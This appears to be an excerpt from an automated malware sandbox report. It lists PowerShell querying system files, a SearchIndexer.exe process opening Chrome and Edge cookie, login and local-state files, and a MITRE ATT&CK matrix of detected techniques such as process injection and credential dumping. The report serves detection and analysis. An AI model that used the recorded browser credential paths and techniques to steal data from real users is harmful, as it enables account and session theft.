Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies	Jump to behavior
Source: C:\Windows\SysWOW64\SearchIndexer.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies	Jump to behavior

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Command and Scripting Interpreter	1 DLL Side-Loading	612 Process Injection	1 Masquerading	1 OS Credential Dumping	121 Security Software Discovery	Remote Services	1 Email Collection	1 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Abuse Elevation Control Mechanism	11 Disable or Modify Tools	LSASS Memory	2 Process Discovery	Remote Desktop Protocol	1 Archive Collected Data	3 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	1 DLL Side-Loading	41 Virtualization/Sandbox Evasion	Security Account Manager	41 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	1 Data from Local System	4 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	612 Process Injection	NTDS	1 Application Window Discovery	Distributed Component Object Model	Input Capture	4 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 Deobfuscate/Decode Files or Information	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 Abuse Elevation Control Mechanism	Cached Domain Credentials	113 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	4 Obfuscated Files or Information	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	12 Software Packing	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	1 Timestomp	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement
IP Addresses	Compromise Infrastructure	Supply Chain Compromise	PowerShell	Cron	Cron	1 DLL Side-Loading	Network Sniffing	Network Service Discovery	Shared Webroot	Local Data Staging	File Transfer Protocols	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	External Defacement